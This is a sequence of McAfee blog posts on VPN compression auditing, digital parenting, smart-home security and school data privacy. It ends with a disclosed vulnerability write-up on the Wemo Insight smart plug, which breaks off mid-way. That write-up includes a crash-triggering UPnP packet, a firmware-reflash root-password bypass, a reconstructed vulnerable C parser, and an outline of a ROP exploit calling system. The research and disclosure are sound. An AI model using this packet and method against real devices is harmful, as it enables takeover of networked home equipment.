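    tunnelled traffic (or allows it to be pushed). An empty list means no
    compression-enabling directive was found."""
    findings = []
    for lineno, raw in enumerate(config_text.splitlines(), 1):
        # OpenVPN treats '#' and ';' as comment starters.
        line = re.split(r"[#;]", raw, maxsplit=1)[0].strip()
        if not line:
            continue
        parts = line.split()
        directive, args = parts[0], parts[1:]

        if directive == "comp-lzo":
            mode = args[0] if args else "adaptive"  # bare comp-lzo == adaptive
            if mode != "no":
                findings.append(
                    f"line {lineno}: 'comp-lzo {mode}' enables LZO compression")
        elif directive == "compress":
            algo = args[0] if args else None
            if algo in COMPRESSING_ALGOS:
                findings.append(
                    f"line {lineno}: 'compress {algo}' enables compression")
        elif directive == "allow-compression":
            mode = args[0] if args else "(missing mode)"
            if mode != "no":
                findings.append(
                    f"line {lineno}: 'allow-compression {mode}' permits "
                    "compression to be used or pushed by the server")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        result = audit_openvpn_compression(cfg)
        print(f"{name}: {result or 'no compression directives found'}")
```

An empty result means nothing in the client config turns compression on, but a client with a bare compress line can still have an algorithm pushed by the server; that is why the hardened sample states allow-compression no explicitly rather than simply omitting the directive.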

Luckily the McAfee Safe Connect VPN was not built on the vulnerable OpenVPN code. That said, I want to take this opportunity to remind you of something we talk about a lot in the security industry: relying on only one layer of security is simply not enough today. Here are some tips and best practices to stay safe.

  • Set up multi-factor authentication whenever possible. This tip is especially important for valuable accounts like email or social media, which might be connected to financial information. With multi-factor authentication in place, you’ll be better protected by combining your usual login information with another layer of protection, such as a one-time password sent to your phone, biometrics (say, a thumbprint), or a security token that you’ll need to confirm before getting access to your account.
  • Use secure websites (HTTPS) whenever possible. The ‘S’ at the end of HTTPS stands for ‘Secure’. It means all communications between your browser and the website are encrypted. Most websites are moving toward this standard practice, so if you notice yourself landing on a website with just HTTP, stay alert.
  • Avoid making financial transactions until you’re on a network you trust. Sharing personal data like your credit card information can lead to unnecessary vulnerabilities. The best bet is to wait until you’re on your home network with additional layers of security such as McAfee’s Secure Home Platform already in place.
  • Consider using your mobile network and being your own hotspot. If your mobile or IoT data plan includes a hot spot, consider using that over Wi-Fi to avoid some of the challenges that come with it in the first place.
  • Do continue to use a personal VPN when you’re on the go and using Wi-Fi, just be sure to do so while having an additional layer of security in place so that if a similar vulnerability is discovered, you’ll already have a backup.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

The post The VORACLE OpenVPN Attack: What You Need to Know appeared first on McAfee Blogs.

5 Reasons Why Strong Digital Parenting Matters More than Ever

As a parent raising kids in a digital culture, it’s easy to feel at times as if you have a tiger by the tail and that technology is leading your family rather than the other way around.

But that familiar feeling — the feeling of being overwhelmed, outsmarted, and always a step or two behind the tech curve — is just a feeling, it’s not a fact.

Digital Parenting Matters

The fact is, you are the parent. That is a position of authority, honor, and privilege in your child’s life. No other person (device, app, or friend group) can take your place. No other voice is more influential or audible in your child’s mind and heart than yours.

It’s true that technology has added several critical skills to our parenting job description. It’s true that screens have become an integral part of daily life and that digital conversation can now shape our child’s self-image and perspective of his or her place in the world. All of this digital dominance has made issues such as mental health, anxiety, and cyberbullying significant concerns for parents.

What’s also true is that we still have a lot of control over our kids’ screen time and the role technology plays in our families. Whether we choose to exercise that influence is up to us, but the choice remains ours.

Here are just a few reasons why strong digital parenting matters more than ever. And, some practical tools to help you take back any of the influence you feel you may have lost in your child’s life.

5 Digital Skills to Teach to Your Kids

Resilience

According to the American Psychological Association, resilience is the ability to adapt well to adversity, trauma, tragedy, threats or even significant sources of stress. Resilience isn’t something you are born with. Kids become resilient over time and more so with an intentional parent. Being subject to the digital spotlight each day is a road no child should have to walk alone. September is National Suicide Prevention Month and an excellent opportunity to talk to your kids about resilience building. Digital Parenting Skills: Helping kids understand concepts like conflict-management, self-awareness, self-management, and responsible decision-making is one of the most critical areas of parenting today. Start the conversations, highlight examples of resilience in everyday life, model resilience, and keep this critical conversation going.

Empathy

Empathy is the ability to understand and share the feelings of another person. Unfortunately, in the online space, empathy isn’t always abundant, so it’s up to parents to introduce, model, and teach this character trait. Digital Parenting Skills: According to Dr. Michele Borba, author of #UnSelfie: Why Empathetic Kids Succeed in Our All-About-Me World, there are 9 empathy-building habits parents can nurture in their kids including Emotional Literacy, Moral Identity, Perspective Taking, Moral Imagination, Self Regulation, Practicing Kindness, Collaboration, Moral Courage, and Altruistic Leadership Abilities.

Life Balance

Screentime is on the rise, and there’s no indication that trend is going to change. If we want kids that know the value of building an emotionally and physically healthy life, then teaching (and modeling) balance is imperative today. Digital Parenting Skills: Model screentime balance in your life. Be proactive in planning device-free activities for the whole family, and use software that will help you establish time limits on all devices. You might be surprised how just a few small shifts in your family’s tech balance can influence the entire vibe of your home.

Reputation Management

Most kids work reasonably hard to curate and present a specific image on their social profiles to impress their peers. Few recognize that within just a few years, colleges and employers will also be paying attention to those profiles. One study shows that 70% of employers use search engines and social media to screen candidates. Your child’s digital footprint includes everything he or she says or does online, from posts to casual “likes,” silly photos, and comments. Digital Parenting Skills: Know where your kids go online. Monitor their online conversations (without commenting publicly). Don’t apologize for demanding they take down inappropriate or insensitive photos, comments, or retweets. The most important part of monitoring is explaining why the post has to come down. Simply saying “because I said so,” or “that’s crude,” isn’t enough. Take the time to discuss the reasons behind the rules.

Security and Safety

It’s human nature: Most of us aren’t proactive. We don’t get security systems for our homes or cars until a break-in happens to us or a close friend. Often, we don’t act until it gets personal. The same is true for taking specific steps to guard our digital lives. Digital Parenting Skills: Talk to your kids about online risks including scams, viruses and malware, identity fraud, predators, and catfishing. Go one step further and teach them about specific tools that will help keep them safe online. The fundamentals of digital safety are similar to teaching kids habits such as locking the doors, wearing a seatbelt or avoiding dangerous neighborhoods.

Your kids may be getting older and may even shrug off your advice and guidance more than they used to but don’t be fooled, parents. Kids need aware, digitally savvy parents more than ever to navigate and stay safe — both emotionally and physically — in the online arena. Press into those hard conversations and be consistent in your digital parenting to protect the things that truly matter.

Want to connect more to digital topics that affect your family? Stop by ProtectWhatMatters.online. Also, join the digital security conversation on Facebook.

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures)

The post 5 Reasons Why Strong Digital Parenting Matters More than Ever appeared first on McAfee Blogs.

Inside a Modern-Day Smart Home

Ever wonder how the Internet of Things (IoT) first began? Often regarded as the first IoT device, John Romkey created a toaster that could be turned on and off over the internet for the October ’89 INTEROP conference. Then in 2000, LG announced its first internet refrigerator plans. So on and so forth IoT grew and grew, populating homes everywhere. Soon enough, we got the smart home. Though the name itself has become household, many people may not fully understand the ins and outs of a smart home. And beyond that, many don’t know the security implications tied to it. Let’s take a look.

Popularity via Convenience

According to Gartner, 20.8 billion connected devices are predicted to exist in consumer homes by 2020. So why have these devices and the smart homes they fill boomed so drastically in popularity in the past few years? One word: convenience.

If we use enough of them, these devices automate our daily existence. They turn our lights on for us, flip music on at the sound of our voice, even change the temperature in our house. And they’ve become all too easy to accumulate since the technology has started to become more affordable. A few of the key and common smart devices that can be found in a modern smart home include smart refrigerators, smart lights, smart speakers, smart TVs. Beyond that, more family-oriented devices are becoming smart — including baby cams, thermometers, and children’s toys.

As we look ahead, it’s been predicted that the type of devices that are “smart” will grow to become more diverse, driving wider adoption. And that will cause more businesses to jump on the IoT train — builders, developers and anyone in the world of residential life are going to link up with smart tech.

The Digital (and Physical) Impact of IoT

But the continuous growth of these devices, now and in the future, is something we all have to be smart about. These IoT devices are convenient, but their build makes them a convenient target for cybercriminals. This is because many IoT devices aren’t built with security in mind, and users often leave default settings on, which makes it easy for hackers to breach them. Just take the McAfee ATR team’s recent discovery about the Wemo Insight Smart Plug for example: the device was found to contain a crucial vulnerability that could allow hackers to manipulate it. Not to mention, digital assistants are susceptible to something called a ‘Dolphin Attack,’ which can be leveraged by cybercriminals to potentially breach a user.

And since all these IoT devices must connect to Wi-Fi, they can expose an entire network to threats. In fact, according to a recent McAfee survey, the biggest worry among recent respondents about having their wireless home network hacked is that cybercriminals could steal personal information and make them a victim of identity theft (63%).

There are physical repercussions to a vulnerable IoT device as well. Once they’ve hacked a connected device, cybercriminals can also manipulate the device itself and can flip the lights off, listen in on your smart baby monitor, the list goes on.

Connecting With Care

The good news is there are a few things we can all do to prevent IoT attacks and still enjoy our smart homes. First things first, we must all buy IoT devices with security in mind. Just by doing some basic research and looking up the manufacturers, we can get a feel if they have security top of mind. Most importantly, we have to change default settings and use a security solution that protects our homes at the router-level, such as McAfee Secure Home Platform.

By following these best practices, we can live our connected lives with confidence and enjoy the convenience of our high-tech homes. Both our homes and our personal security will remain smart.

To learn more about smart homes and IoT, be sure to follow us at @McAfee and @McAfee_Home.

The post Inside a Modern-Day Smart Home appeared first on McAfee Blogs.

Family Tech: How Safe is Your Child’s Personal Data at School?

Right about now, most kids are thinking about their chemistry homework, the next pep rally, or chiming in on their group text. The last thing on their minds as they head back to school is cybersecurity. But, it’s the one thing — if ignored — that can wreck the excitement of a brand new school year.

You’ve done a great job, parent. You’ve equipped their phones, tablets, and laptops with security software. And, you’ve beefed up safeguards on devices throughout your home. These efforts go a long way in protecting your child’s (and family’s) privacy from prying eyes. Unfortunately, when your child walks out your front door and into his or her school, new risks await.

No one knows this season better than a cybercriminal. Crooks know there are loopholes in just about every school’s network and that kids can be easy targets online. These security gaps can open kids up to phishing scams, privacy breaches, malware attacks, and device theft.

The school security conversation

Be that parent. Inquire about your school’s security protocols. The K-12 Cybersecurity Resource Center reports that 358 school breaches have taken place since January of 2016. Other reports point to an increase in hackers targeting school staff with phishing emails and seeking student social security numbers to sell on the dark web.

A few questions to consider:

  • Who has physical and remote access to your student’s digital records and what are the school’s protection practices and procedures?
  • How are staff members trained and are strong password protocols in place?
  • What security exists on school-issued devices? What apps/software are being used and how will those apps collect and use student data?
  • What are the school’s data collection practices? Do data collection practices include encryption, secure data retention, and lawful data sharing policies?
  • What is the Bring Your Own Device (BYOD) policy?

The data debate

As K-12 administrators strive to maintain secure data collection practices for students, those same principles may be dubious as kids move on to college. As reported by Digiday, one retailer may be quietly disassembling privacy best practices with a bold “pay with data” business model. The Japanese coffee chain Shiru Café offers students and faculty members of Brown University free coffee in exchange for entering personal data into an online registry. Surprisingly, the café attracts some 800 customers a day and is planning on expanding its business model to more college campuses.

The family conversation

Keep devices close. Kids break, lose, lend, and leave their tech unattended and open to theft. Discuss responsible tech ownership with your kids. Stolen devices are privacy gold mines.

Never share passwords. Kids express their loyalty to one another in different ways. One way that’s proving popular but especially unsafe nowadays is password sharing. Remind kids: It’s never okay to share passwords to devices, social networks, or school platforms. Never. Password sharing opens up your child to a number of digital risks.

Safe clicking, browsing practices. Remind kids when browsing online to watch out for phishing emails, fake news stories, streaming media sites, and pop-ups offering free downloads. A bad link can infect a computer with a virus, malware, spyware, or ransomware. Safe browsing also includes checking for “https” in the URL of websites. If the website only loads with an “http,” the website may not be enforcing encryption.

Be more of a mystery. Here is a concept your kids may or may not latch on to but challenge them to keep more of their everyday life a mystery by posting less. This includes turning off location services and trying to keep your whereabouts private when sharing online. This challenge may be fun for your child or downright impossible, but every step toward boosting privacy is progress!

Discuss the risk of public Wi-Fi. Kids are quick to jump on Wi-Fi wherever they go so they can use apps without depleting the family data plan. That habit poses a big problem. Public Wi-Fi is a magnet for hackers trying to get into your device and steal personal information. Make sure every network your child logs on to requires a password to connect. Go a step further and consider using a Virtual Private Network (VPN) for added security for your whole family.

Want to connect more to digital topics that affect your family? Stop by ProtectWhatMatters.online, and follow @McAfee_Family on Twitter. Also, join the digital security conversation on Facebook.

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures)

The post Family Tech: How Safe is Your Child’s Personal Data at School? appeared first on McAfee Blogs.

Microsoft MCSE Certification: Your Next Big Step in IT Career

Microsoft MCSE is the most in-demand certification for all those professionals who work in the Information Technology industry. Most IT companies prefer hiring those workers who carry the Microsoft MCSE certificate. That is why most of the IT job applicants today try to get certified by Microsoft. In the competitive job market, MCSE helps an […]

‘Insight’ into Home Automation Reveals Vulnerability in Simple IoT Product

Eoin Carroll, Charles McFarland, Kevin McGrath, and Mark Bereza contributed to this report. 

The Internet of Things promises to make our lives easier. Want to remotely turn lights and appliances on and off and monitor them online? A “smart plug,” a Wi-Fi–connected electric outlet, is one simple method. But IoT devices can turn into attack vectors if they are not properly secured.

The McAfee Labs Advanced Threat Research team is committed to uncovering security issues in both software and hardware to help their developers provide safer products for businesses and consumers. We recently investigated a consumer product produced by Belkin. Our research into the Wemo Insight Smart Plug led to the discovery of an unreported buffer overflow in the libUPnPHndlr.so library. This flaw, CVE-2018-6692, allows an attacker to execute remote code. Following our responsible disclosure policy, we reported this research to Belkin on May 21.

Can this vulnerability lead to a useful attack? A smart plug by itself has a low impact. An attacker could turn off the switch or at worst possibly overload the switch. But if the plug is networked with other devices, the potential threat grows. The plug could now be an entry point to a larger attack. Later in this report, we will look at one possible attack.

Exploring the attack surface

Following the manual’s advice, the team used the Wemo phone application to set up the smart plug. We were able to remotely turn the outlet on and off. We then tested the software, including port scanning, monitoring normal network traffic, and reading online research. The Wemo listens on Universal Plug and Play (UPnP) ports TCP 49152 and 49153. The manuals, disassembly images, and the general-purpose programming language (GPL) were all online; they provided information on CPU architecture, the operating system, and applications.

We turned to the hardware and disassembled the device. We identified chips on the main board, found headers for communicating with the device, and pulled the memory off flash. Our online research provided datasheets for each of the chips on the board.

We found universal asynchronous receiver-transmitter (UART) pads on the board and confirmed them with the documentation. We soldered wires to these headers to discover if they were actively transmitting. To test communication with the device, we used an Exodus XI Breakout board, shown below:

After brute-forcing the baud rate, we were able to get debug information via the UART interface. The UART also provided a login prompt; however, neither online research nor simple guessing led us to a working password.

Extraction and firmware analysis

The flash chip discovered on the board was a Macronix MX25L12835F, which is supported by flashrom, a well-known open-source tool for extracting firmware. Using flashrom and the XI Breakout board, we extracted the firmware from the Wemo device. After we obtained the original firmware image shipped with the device, we updated it using the Wemo mobile application. Once the device was updated, we again extracted the firmware from the device, providing us with a second image. We ran basic sanity checks with the new firmware to ensure our earlier software reconnaissance had not changed.

With the firmware extracted, we analyzed the firmware using binwalk, an open-source binary analysis tool. Binwalk extracted the file system from the firmware for further inspection. Access to the file system allowed us to review system configuration and access binaries.

Finding a vulnerability 

Network or remote vulnerabilities are more dangerous than local flaws, so we took a close look at the UPnP ports listening on the local network. During this testing phase our lead analyst was taking a class on Exodus Intelligence Embedded Exploitation. One of the class instructors, Elvis Collado (@b1ack0wl) was developing a UPnP fuzzer and offered to assist our efforts. Using this tool we started fuzzing the open UPnP ports, while monitoring the UART interface on the Wemo. After a short time we saw a crash on the UART interface.

11:37:16.702 stuntsx0x46ac6 STUN client transaction destroyed
sending SIGSEGV to wemoApp for invalid write access to
464d4945 (epc == 2ac1fb58, ra == 2ac1fccc)
Cpu 0
$ 0 : 00000000 00000001 0000006d 464d4945
$ 4 : 31d2e654 31d2e770 00000003 00000001
$ 8 : 0000007c fffffff8 00000007 00000002
$12 : 00000200 00000100 00000807 00000800
$16 : 31d2e6f0 31d2e898 004a1cb8 00000002
$20 : 31d2e638 31d2e6c0 004a1388 31d2e640
$24 : 00000400 2ac1fb30
$28 : 2ac77d40 31d2e600 31d2e648 2ac1fccc
Hi : 00000008
Lo : 00000000
epc : 2ac1fb58 Tainted: P
ra : 2ac1fccc Status: 0100fc13 USER EXL IE
Cause : 8080000c
BadVA : 464d4945
PrId : 0001964c
Modules linked in: softdog rt_rdm rt2860v2_ap(P) raeth
Process wemoApp (pid: 2157, threadinfo=80fa0000, task=802c87f0)
Stack : 2a0000d0 fffffffe 31d2e6f0 31d2e770 31d2e76f 31d2e6f0 31d2e6f0 31d2e770
00000000 31d2e604 00000000 00000000 2ac77d40 00000000 4f464751 4a484d4c
4e444241 47454f49 50464658 45414d42 43445044 464d4945 5552414c 46495048
4b524141 41445a4f 44534e4a 4e4e494c 44434357 494a4855 44515455 44494b45
55584a44 584e4f52 545a5247 51545954 595a4c42 4e594a45 484f5158 46474944

Call Trace:

Code: 80a20000 50480004 a0600000 <5440fffa> a0620000 a0600000 10a00006 24840004 24a50001
thready: Destructor freeing name "ChildFDTask".
Aborted

After repeating and closely observing the experiment several times, we determined that the crash was caused by the following packet:

POST /upnp/control/basicevent1 HTTP/1.1
Host: 192.168.225.183:49154
User-Agent: python-requests/2.9.1
Accept: */*
Connection: keep-alive
SOAPAction: "urn:Belkin:service:basicevent:1#UpdateInsightHomeSettings"
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 3253

<?xml version="1.0" ?><s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><b1ack0wl_ns:UpdateInsightHomeSettings xmlns:b1ack0wl_ns="urn:Belkin:service:basicevent:1"><EnergyPerUnitCost>210</EnergyPerUnitCost><Currency>236</Currency><EnergyPerUnitCostVersion>KWWZWIVYBQZKDGSSAAPBCQVQQFAVYZEOEUFIDXXQPDYGESTOD
GIJFERXZNMYAFJQLUZPSIJXFQSPADCRIVHDAJLLPQMPLAVECIQUWLXDLIGPLBKCROGPOCVUI
KTSLIIXULOEBVFKWIERCFGHWHCBBDLWFBKBZXAVGRKTDALDNRPOFQJDXAEOC(…snip…)XHU
OUZPCHUBFGLLWSJBFYFOMCGZZMJIQIUVCDETFBRBZVDVKNBVZFBRSVBSZPAYKZYNQZEQPDV
DWSZNDUPUDCPAVWNFBFBTYMXTBNCWTBJPKORUBHBSCQBPOPOBZNVADMGWRI
</EnergyPerUnitCostVersion></b1ack0wl_ns:UpdateInsightHomeSettings></s:Body></s:Envelope>

For space reasons some of the payload has been removed. (The original data in “EnergyPerUnitCostVersion” was 2,828 characters.) After examining the crash data and the packet, this appears to be a standard buffer overflow, in which data from the packet is written past the end of a buffer and onto the stack. We continued fuzzing, now focused on the “EnergyPerUnitCost” field, and found we needed only 32 characters to crash the application.

Although the crash dump provides us with a lot of good information, there is still a lot we do not know. For example, the crash occurs in the “WemoApp” and provides us an offset, but what is the base address of this library? What has been overwritten on the stack? Without access to the application during runtime these questions are difficult to answer. Because we obtained the file system earlier, we could statically analyze the WemoApp binary; but we would still be unable to determine the exact point of the crash easily.

To answer these questions we needed to take one of two paths. We could virtualize the Wemo firmware or binary to continue testing; or if we could determine the root password on the UART interface, there is a chance we could debug on the device itself. Generally, virtualizing firmware is not simple and can sometimes lead to inaccurate test results. It is better to debug on the device. With all the information we found during reconnaissance, it seemed promising that we could bypass the root password. (We did spend some time attempting to virtualize the WemoApp—with no success.)

Bypassing the root password

From the extracted file system, we learned the Wemo runs the embedded Linux system OpenWRT, with the user account information held in either the standard /etc/passwd or /etc/shadow files. We extracted the hash for the root password from /etc/passwd and submitted it to a cracking rig. This method proved ineffective in a reasonable amount of time.

With our ability to read the flash chip we had a good chance to write to the chip. Barring any checksum or validations done on the firmware, we might be able to replace the /etc/passwd file with a known password.

To test this theory, we would have to repack the firmware. Since the Wemo’s GPL source release is public, we chose to use the same tools the developers used. From the GPL sources, we compiled the same version of squash tools 3.0 with lzma and repackaged the firmware file system with a modified /etc/passwd file. We added padding to ensure the firmware section was the same size as the original. We then used “dd” to insert the new file system segment into the firmware binary. During this process, we discovered that using binwalk to extract the firmware prevented us from correctly repackaging it. Instead, we used “dd” with the section offsets reported by binwalk to extract the correct section of the firmware binary for repackaging.

With a new firmware binary in hand, we used the XI Breakout board and flashrom to write the firmware to the flash chip on the board. After rebooting the device, we were able to log in using the new password.

Analyzing the crash 

With root access on the Wemo, we could gather more information about the crash during the UPnP fuzzing. First, we needed to compile the tools required to perform more in-depth analysis for this specific architecture. Using the GPL, we compiled gdbserver and gdb for the device. The Wemo had a large amount of installed tools, such as “wget,” making it simple to add files. We downloaded and executed the tools from the /tmp directory.

After many attempts, we failed to get gdb running either directly on the device or remotely against it. So we used gdbserver, in conjunction with IDA Pro (Interactive Disassembler Pro), for all debugging. With the debugger connected, we sent the packet causing the crash and saw the exact location of the crash: a segmentation fault occurred at address 0x2AC15B98. From the memory layout in the Linux “proc” directory, we determined this address resides in the library libUPnPHndlr.so.

2abf3000-2ac4d000 r-xp 00000000 1f:02 82 /rom/lib/libUPnPHndlr.so

Because the crash was caused by a UPnP packet, it was logical to find the crash inside this library. With the base address 0x2abf3000, we calculated the offset for static analysis in IDA to be 0x22b98. At this address, we found the following:

LOAD:00022B70  # =============== S U B R O U T I N E =======================================
LOAD:00022B70
LOAD:00022B70
LOAD:00022B70                 .globl TokenParser
LOAD:00022B70 TokenParser:                             # CODE XREF: ProcessEnergyPerunitCostNotify+84↓p
LOAD:00022B70                                          # DATA XREF: LOAD:00004210↑o …
LOAD:00022B70                 beqz    $a1, locret_22BC0
LOAD:00022B74                 move    $a3, $zero
LOAD:00022B78                 move    $a3, $zero
LOAD:00022B7C                 b       loc_22BB4
LOAD:00022B80                 li      $t0, 0x7C  # '|'
LOAD:00022B84  # ---------------------------------------------------------------------------
LOAD:00022B84
LOAD:00022B84 loc_22B84:                               # CODE XREF: TokenParser+28↓j
LOAD:00022B84                 addiu   $a1, 1
LOAD:00022B88                 addiu   $v1, 1
LOAD:00022B8C
LOAD:00022B8C loc_22B8C:                               # CODE XREF: TokenParser+48↓j
LOAD:00022B8C                 lb      $v0, 0($a1)
LOAD:00022B90                 beql    $v0, $t0, loc_22BA4
LOAD:00022B94                 sb      $zero, 0($v1)
LOAD:00022B98                 bnezl   $v0, loc_22B84
LOAD:00022B9C                 sb      $v0, 0($v1)
LOAD:00022BA0                 sb      $zero, 0($v1)
LOAD:00022BA4
LOAD:00022BA4 loc_22BA4:                               # CODE XREF: TokenParser+20↑j
LOAD:00022BA4                 beqz    $a1, locret_22BC0
LOAD:00022BA8                 addiu   $a0, 4
LOAD:00022BAC                 addiu   $a1, 1
LOAD:00022BB0                 addiu   $a3, 1
LOAD:00022BB4
LOAD:00022BB4 loc_22BB4:                               # CODE XREF: TokenParser+C↑j
LOAD:00022BB4                 slt     $v0, $a3, $a2
LOAD:00022BB8                 bnezl   $v0, loc_22B8C
LOAD:00022BBC                 lw      $v1, 0($a0)
LOAD:00022BC0
LOAD:00022BC0 locret_22BC0:                            # CODE XREF: TokenParser↑j
LOAD:00022BC0                                          # TokenParser:loc_22BA4↑j
LOAD:00022BC0                 jr      $ra
LOAD:00022BC4                 move    $v0, $a3
LOAD:00022BC4  # End of function TokenParser

Because the developers left the binary unstripped, we can name this function TokenParser. The segmentation fault occurs at a branch instruction; however, in MIPS the delay instruction is executed before the branch occurs. Thus the instruction at 0x22B9C is causing the crash. Here the application attempts to load what is at the address stored in $v1 and place it in $v0. Taking a look at the registers, we find the data from our packet in XML tags “EnergyPerUnitCostVersion” is in $v1, leading to an “invalid write access” segmentation fault error.

After statically analyzing the function, it appears to copy data from one section to another, looking three times for a 0x7C or “|” character. If it never finds the “|,” it keeps copying into a statically defined buffer. To fully understand why the overwrite occurs, let’s take a look at the stack as we step through the function:

2EF17630 2AC692F0 MEMORY:2AC692F0
2EF17634 00000000 MEMORY:saved_fp
2EF17638 34333231 MEMORY:34333231 ← previously copied data
2EF1763C 00000035 MEMORY:retaddr+31  ← next byte will be written at 0x2EF1763D
2EF17640 00000000 MEMORY:saved_fp  ← zeroed out memory prepared for the copy
2EF17644 00000000 MEMORY:saved_fp
2EF17648 00000000 MEMORY:saved_fp
2EF1764C 00000000 MEMORY:saved_fp
2EF17650 2EF17638 MEMORY:2EF17638 ← start writing at this address; can be overwritten

As the function copies data onto the stack, it eventually overwrites the saved address of the original buffer. Once this address is overwritten, the function attempts to write the next byte to the new value, which in this case is an invalid address. This overflow gives an attacker two exploitable vectors: a write-what-where condition, which allows an attacker to write data to an arbitrary location in memory; and, by continuing to overwrite data on the stack, the ability to overwrite the saved $RA register (the return address of the calling function), giving the attacker control of the execution flow.
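As an added illustration (not McAfee’s code or the Wemo firmware’s source), here is a C reconstruction of the copy loop from the listing above, with the register roles assumed from the disassembly, next to a bounded version that rejects an over-long field and never steps past the terminator. The three-token layout, the 16-byte capacity and the sample inputs are constructed for the demo.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_TOKENS 3    /* the listing scans for up to three '|' delimiters */
#define TOKEN_CAP  16   /* constructed field capacity; the real sizes are not on the page */

/* Reconstruction of TokenParser from the listing (assumed register roles:
 * $a0 = array of destination pointers, $a1 = source string, $a2 = token
 * limit, $a3 = tokens parsed). Each field is copied until a '|' or NUL is
 * seen; nothing bounds how far the copy runs into dests[i], so an over-long
 * field walks straight past the buffer into whatever sits above it on the
 * caller's stack (the saved buffer pointer in the stack dump above).
 * Kept only for comparison; call it only with inputs known to fit. */
int token_parser_unsafe(char **dests, const char *src, int max_tokens)
{
    int count = 0;
    if (src == NULL)
        return count;
    while (count < max_tokens) {
        char *dst = dests[count];
        while (*src != '\0' && *src != '|')   /* the lb / beql / bnezl loop */
            *dst++ = *src++;
        *dst = '\0';
        src++;            /* steps past the '|' - or past the NUL terminator */
        count++;
    }
    return count;
}

/* Hardened form: every destination has a known capacity, an over-long field
 * is rejected rather than truncated, and the scan stops at the terminator
 * instead of reading beyond it. Returns the token count, or -1 on reject. */
int token_parser_safe(char *const *dests, size_t cap, const char *src, int max_tokens)
{
    int count = 0;
    if (src == NULL || cap == 0)
        return -1;
    while (count < max_tokens) {
        char *dst = dests[count];
        size_t used = 0;
        while (*src != '\0' && *src != '|') {
            if (used + 1 >= cap)
                return -1;        /* field would not fit: refuse the whole input */
            dst[used++] = *src++;
        }
        dst[used] = '\0';
        count++;
        if (*src == '\0')
            break;                /* end of input: never step past the NUL */
        src++;                    /* skip the '|' */
    }
    return count;
}

/* Wrappers for a constructed three-field "a|b|c" layout held in fixed buffers. */
int parse_settings_safe(const char *src, char out[MAX_TOKENS][TOKEN_CAP])
{
    char *dests[MAX_TOKENS] = { out[0], out[1], out[2] };
    return token_parser_safe(dests, TOKEN_CAP, src, MAX_TOKENS);
}

int parse_settings_unsafe(const char *src, char out[MAX_TOKENS][TOKEN_CAP])
{
    char *dests[MAX_TOKENS] = { out[0], out[1], out[2] };
    return token_parser_unsafe(dests, src, MAX_TOKENS);
}

int main(void)
{
    char fields[MAX_TOKENS][TOKEN_CAP];
    /* constructed: a third field longer than TOKEN_CAP, like the fuzzed version field */
    const char *oversized = "210|236|KWWZWIVYBQZKDGSSAAPBCQVQQFAVYZEOEUFIDXXQPDYGESTOD";

    printf("safe, well-formed input: %d tokens\n", parse_settings_safe("210|236|v1", fields));
    printf("safe, over-long field: %d (rejected)\n", parse_settings_safe(oversized, fields));
    return 0;
}
```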

Writing the exploit

Now that we understand the vulnerability, can we exploit it? Because this is a standard buffer overflow, we need to answer two questions: how much room is available on the stack, and are there any “bad” bytes that cannot make it onto the stack? To determine the available room, we can examine how much of the payload makes it onto the stack if we repair the overwritten address on the stack with a valid one. We learned only 91 bytes can be written onto the stack.

The next step is to determine if there are any “bad” bytes. After running a few tests, we noticed that only ASCII characters can make it onto the stack. Before the vulnerable code is executed, the packet is parsed by the open-source XML parser “mxml.” This library follows the standard of allowing only ASCII and Unicode characters to exist between tags.

This standard is very problematic for both shellcode and return-oriented programming (ROP) techniques, because both memory addresses and shellcode tend to consist mostly of nonprintable characters. We could use several techniques to work around the limited room on the stack; however, due to the hard limitation on which characters pass through the XML sanitization process, it is best to use functions that are already loaded into memory. One method that does not require extensive shellcode is a “return to libc” attack that executes the system command. Because system typically takes a string as a parameter, that parameter might pass through the filter. Because the Wemo does not use address space layout randomization, if we use ROP it is theoretically possible to call system without passing additional shellcode through the XML filter.

We still face a major challenge: Only addresses comprising entirely ASCII characters can pass through the XML filter. This drastically limits the potential for finding usable gadgets. We used IDA to see where libc and system are loaded into memory, and found two implementations: in libuClibc-0.9.33.2.so at address 0x2B0C0FD4; and in libpthread-0.9.33.2.so at address 0x2AD104F4. However, neither of these addresses meets the requirements to pass through the XML filter. Thus even if we could create an ROP chain, we would not be able to send just the address for system in the packet.

Addresses with bad characters are not a new problem for exploit development. One of the most common bypasses is to use addition or subtraction ROP gadgets to create the required address in a register and call that register. Again, however, we face the limitation on which operands can be used for this addition or subtraction equation due to the XML filter.

After studying the memory layout, we discovered that libuClibc-0.9.33.2.so sits at a memory location with addresses that can bypass the XML filter. We were fortunate that this is a large library, providing a decent list of addresses, because it is the only library in such a space. With this discovery, the team created a tool to assist with the creation of this exploit. The tool pulls out all possible ROP gadgets with usable memory addresses and determines if an addition or subtraction equation could call one of the two system calls found in memory, using only the values that will bypass the filter. The address for system in libuClibc-0.9.33.2.so, 0x2B0C0FD4, did not have any usable operands. However, 0x2AD104F4 did. We found several “filter-proof” operands that when added together equaled 0x2AD104F4.

We employed our tool’s output for all possible ROP gadgets that bypass the filter to build an ROP chain, which uses an addition instruction to create the final address for system and stores it in $s0. After the addition, another gadget moves the address for system into $t9 and calls system. This final gadget also moves an address that can be controlled from the stack into the register holding the parameter for the system call. The entire ROP chain consists of only three gadgets, which easily fit in the stack space provided by the buffer overflow. 


Piecing everything together 

Earlier we discovered two attack techniques that can be used with this vulnerability: a write-what-where, and overwriting the return address on the stack. Each packet sent can use each technique once. To get a parameter to the system call, we must use write-what-where to place the parameter in a writable memory address and pass this address to system. Fortunately, this vulnerable application sets aside a large amount of writable memory that is never used, and in a range accessible to our limited set of addresses that bypass the filter. Unfortunately, the ROP chain that calls system requires the use of write-what-where to handle extra instructions in one of the ROP gadgets. This means that two packets are required to execute the exploit: one to write the parameter for system into memory, and a second to make the call to system. Thus it is important that the first packet exits cleanly and does not crash the program.

